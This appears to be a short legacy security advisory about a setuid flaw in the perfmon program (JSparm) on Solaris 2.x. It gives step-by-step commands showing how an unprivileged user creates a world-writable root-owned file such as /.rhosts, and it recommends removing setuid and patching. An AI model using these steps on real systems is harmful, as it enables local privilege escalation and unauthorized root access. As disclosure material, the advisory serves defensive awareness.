Vulnerability

    /opt/JSParm/bin/perfmon

Affected

    Solaris 2.X

Description

    Kim Yong Jun [Hackerslab bug_paper]  found following.   parm  is a
    program  that  displays   system  information.    parm  is   SunOS
    application.  It's  not included in Solaris basic package.

    There is a  vulneribility in perfmon  program that you  can create
    any file with root privilege as follow:

        $ whoami
        loveyou
        $ umask 0000
        $ /opt/JSparm/bin/perfmon &


        Choose Logging -> Logging File
        In Selection part, input the file path you want to create
        ex:) /.rhosts

        following file is created in a second.
        -rw-rw-rw-   1 root     loveyou         144 Mar  9 03:14 .rhost

Solution

    Remove setuid permition, contact your vendor and get a patch.